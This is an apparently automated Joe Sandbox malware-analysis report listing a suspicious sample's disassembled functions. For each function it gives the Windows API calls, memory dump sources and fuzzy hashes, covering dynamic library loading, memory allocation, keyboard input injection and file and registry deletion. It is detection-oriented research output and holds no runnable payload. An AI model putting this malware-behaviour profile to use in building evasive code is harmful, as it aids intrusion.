                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 934fa591c345569d60d123c4970fdaf9e0f0f710138be5ef07eb50e019a88f0a
                                                        • Instruction ID: 4fac46030bf27cb0b41a74e52802ba3ceeda9bee232f3b076ee203a146e3f8ec
                                                        • Opcode Fuzzy Hash: 934fa591c345569d60d123c4970fdaf9e0f0f710138be5ef07eb50e019a88f0a
                                                        • Instruction Fuzzy Hash: 27D0A7754403228FD7306F31F80CB4237D5AB24701B11A41EE445E2160D77CC8C18618
                                                        Function 0076EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0076EBAF,?,0076EAAC), ref: 0076EBC7
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0076EBD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: 4b5eaacb9170894a4fcd78f9770e9fd376296e82435afb06eb69cd8113018b3b
                                                        • Instruction ID: a79ef5af2e491933d1a19234f725379b65c208c09be71eb12b0f24cbb5e4d60d
                                                        • Opcode Fuzzy Hash: 4b5eaacb9170894a4fcd78f9770e9fd376296e82435afb06eb69cd8113018b3b
                                                        • Instruction Fuzzy Hash: 19D05EB94443138BD7301F30A848F4137D5AB04304B21C41EE85A92150DA78DC818624
                                                        Function 0075137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,0075135F,?,00751440), ref: 00751389
                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0075139B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1071820185
                                                        • Opcode ID: 3455d7b5cf1a082b4ab46769d45f8fcebfa227842271ab9a887c534c83e48844
                                                        • Instruction ID: 18b3ea717542cb8ec65c2b90a79cef23bdec32585bf778c1b7c5c5432e8517b1
                                                        • Opcode Fuzzy Hash: 3455d7b5cf1a082b4ab46769d45f8fcebfa227842271ab9a887c534c83e48844
                                                        • Instruction Fuzzy Hash: 75D0A7728403129FD7300F24F808BC137D6AF04306F05C41EE885D2550DABCCCC49714
                                                        Function 007513A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00751371,?,00751519), ref: 007513B4
                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007513C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1587604923
                                                        • Opcode ID: 159a2649dd273bf3995e0e6b04b048aa3b44821bd855dc333f3bbb84f2b194e0
                                                        • Instruction ID: 7071091100d395837b188d9283aec8a931738110b34283ae9656ac35a23fa7b9
                                                        • Opcode Fuzzy Hash: 159a2649dd273bf3995e0e6b04b048aa3b44821bd855dc333f3bbb84f2b194e0
                                                        • Instruction Fuzzy Hash: 1BD0A9B28403169FD7300F24F808B8237EAAF4030AF01842EE895D2660DAFCC885CB18
                                                        Function 00773ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00773AC2,?,00773CF7), ref: 00773ADA
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00773AEC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: db0ab0e171b1a4e5cd3b4e1ff630f6fafb614c55444b2aee2efcb93fe74e45f8
                                                        • Instruction ID: a71b853d05eeb1f5871716e57586afe5789532bc754005f42d0ce554013cce1d
                                                        • Opcode Fuzzy Hash: db0ab0e171b1a4e5cd3b4e1ff630f6fafb614c55444b2aee2efcb93fe74e45f8
                                                        • Instruction Fuzzy Hash: 67D052B14403138EEB208B20A80EB4237E9AB11304B02C42EE499A2260EAB8C9808A18
                                                        Function 0071AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00766AA6), ref: 0071AB2D
                                                        • _wcscmp.LIBCMT ref: 0071AB49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper_wcscmp
                                                        • String ID:
                                                        • API String ID: 820872866-0
                                                        • Opcode ID: 7ec9617cf4e5fd88a8adcf60ea611c80752bd86d3a934d35e6251a4e25338ee6
                                                        • Instruction ID: 9a9bfa7201ac2bcd7eb70957fe057a5c39ffddbb8e112a0d9c99fee6191ba593
                                                        • Opcode Fuzzy Hash: 7ec9617cf4e5fd88a8adcf60ea611c80752bd86d3a934d35e6251a4e25338ee6
                                                        • Instruction Fuzzy Hash: 10A1187070110BEBDB15DF68E985AADB7B1FF44310F64816AEC16832D0EB3898B1C796
                                                        Function 00770D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 00770D85
                                                        • CharLowerBuffW.USER32(?,?), ref: 00770DC8
                                                          • Part of subcall function 00770458: CharLowerBuffW.USER32(?,?,?,?), ref: 00770478
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00770FB2
                                                        • _memmove.LIBCMT ref: 00770FC2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 17149999b68f34682d0d485472a1763594870f5a6577bcce9aa81b84dce01cfc
                                                        • Instruction ID: 48a492967df6889f72730690a3513fbb85b1fd42a0caf5df9a399bcff4578f68
                                                        • Opcode Fuzzy Hash: 17149999b68f34682d0d485472a1763594870f5a6577bcce9aa81b84dce01cfc
                                                        • Instruction Fuzzy Hash: CFB17A71604300DFCB14DF28C88496AB7E4EF89754F14886EF8899B352DB79ED46CB92
                                                        Function 0075CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007141A7: _fseek.LIBCMT ref: 007141BF
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF49
                                                          • Part of subcall function 0075CE59: _wcscmp.LIBCMT ref: 0075CF5C
                                                        • _free.LIBCMT ref: 0075CDC9
                                                        • _free.LIBCMT ref: 0075CDD0
                                                        • _free.LIBCMT ref: 0075CE3B
                                                          • Part of subcall function 007328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328DE
                                                          • Part of subcall function 007328CA: GetLastError.KERNEL32(00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328F0
                                                        • _free.LIBCMT ref: 0075CE43
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 30d15ad93e048db68417a13e41db7528ee362282cc2eea407e49c552a100afb3
                                                        • Instruction ID: 9a861005ad4eb68eae557d6a640e081256943aa09133f9c7acd0cb3f61941e49
                                                        • Opcode Fuzzy Hash: 30d15ad93e048db68417a13e41db7528ee362282cc2eea407e49c552a100afb3
                                                        • Instruction Fuzzy Hash: D9514AB1D04218EFDB159F68CC85BEEBBB9BF08300F1000AEB659A3291D7755A848F59
                                                        Function 0077C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(01788400,?), ref: 0077C354
                                                        • ScreenToClient.USER32(?,00000002), ref: 0077C384
                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0077C3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 3cc6c0a59f04025978e974b37b9ce6c5a52f21062aeac324ec956e4c7dbdc558
                                                        • Instruction ID: 41e86b3294201882d9586546cc41f31eb5b2fb4d911542d0b97cad2055a4ec99
                                                        • Opcode Fuzzy Hash: 3cc6c0a59f04025978e974b37b9ce6c5a52f21062aeac324ec956e4c7dbdc558
                                                        • Instruction Fuzzy Hash: 69516171A00204EFCF21DF68D880AAE7BB5BB493A0F20C559F9299B291D774DD41CB51
                                                        Function 0074D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0074D258
                                                        • __itow.LIBCMT ref: 0074D292
                                                          • Part of subcall function 0074D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0074D549
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0074D2FB
                                                        • __itow.LIBCMT ref: 0074D350
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: d4794ee91ab2d48e1de2c1131895e9ac6f7d5887ace1fa28172c8ca061246b25
                                                        • Instruction ID: 547c4420d46427653cc35168592ee1230c19e6d860d6fabb66e6b9e762d1ee42
                                                        • Opcode Fuzzy Hash: d4794ee91ab2d48e1de2c1131895e9ac6f7d5887ace1fa28172c8ca061246b25
                                                        • Instruction Fuzzy Hash: FF41B871A00609EBDF25EF58C856FEE7BB9AF48700F000029FA45A71C1DBB89E85CB51
                                                        Function 0075EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0075EF32
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0075EF58
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0075EF7D
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0075EFA9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 79ae80a2a4e49501ac698d39b4e8c9f48cdce4acedc6e9707fc9546b08f26f15
                                                        • Instruction ID: 807c775240aaa069847dc1acbcf4e03f6a484885aa4cf6e8fe3abaa837fa2534
                                                        • Opcode Fuzzy Hash: 79ae80a2a4e49501ac698d39b4e8c9f48cdce4acedc6e9707fc9546b08f26f15
                                                        • Instruction Fuzzy Hash: 28416D35600611DFCB10EF19C549A89BBE5EF89720B15C089EC46AF3A2CB78FD41CB91
                                                        Function 0077B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0077B3E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: e7d4d4116edc2e493877cfde351322d041e8553ca76c262770879f2039bb756c
                                                        • Instruction ID: 21d6f53359df87c3effc7186a02f8a2bef5a01c859ce14ff4d99ab7b265ab389
                                                        • Opcode Fuzzy Hash: e7d4d4116edc2e493877cfde351322d041e8553ca76c262770879f2039bb756c
                                                        • Instruction Fuzzy Hash: CD31A234600284FBEF349E58DC89BA83765EB0A3D0F54C512FA59D71A2C73CD9819B51
                                                        Function 0077D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0077D617
                                                        • GetWindowRect.USER32(?,?), ref: 0077D68D
                                                        • PtInRect.USER32(?,?,0077EB2C), ref: 0077D69D
                                                        • MessageBeep.USER32(00000000), ref: 0077D70E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 6975349f8a6b1c2d599e030e9065e972298454f169dab5e4b3f69289a07f1279
                                                        • Instruction ID: 71653c8db4298ab9ec167cdcbd610ed2d36e5e4ea0138b7a9f828a13485189c2
                                                        • Opcode Fuzzy Hash: 6975349f8a6b1c2d599e030e9065e972298454f169dab5e4b3f69289a07f1279
                                                        • Instruction Fuzzy Hash: 61414730A00118EFCF25CF98D884AA97BF5BF49390F18C1AAE449DB251E739EC51DB90
                                                        Function 00754497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007544EE
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0075450A
                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0075456A
                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007545C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 0d180443b62329127b9fb8f836b390589bb3ce7b5f0d417423eda3b65a2b0b94
                                                        • Instruction ID: 12eb23cbc60c63f761cb4d8068b9c3a62bc43cc14d477ad4062cf3d7398f470f
                                                        • Opcode Fuzzy Hash: 0d180443b62329127b9fb8f836b390589bb3ce7b5f0d417423eda3b65a2b0b94
                                                        • Instruction Fuzzy Hash: 813109719002589FEF348B6488087FE7BB59B4931AF04016AF881531D1E7FC9EADD761
                                                        Function 00744DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00744DE8
                                                        • __isleadbyte_l.LIBCMT ref: 00744E16
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00744E44
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00744E7A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
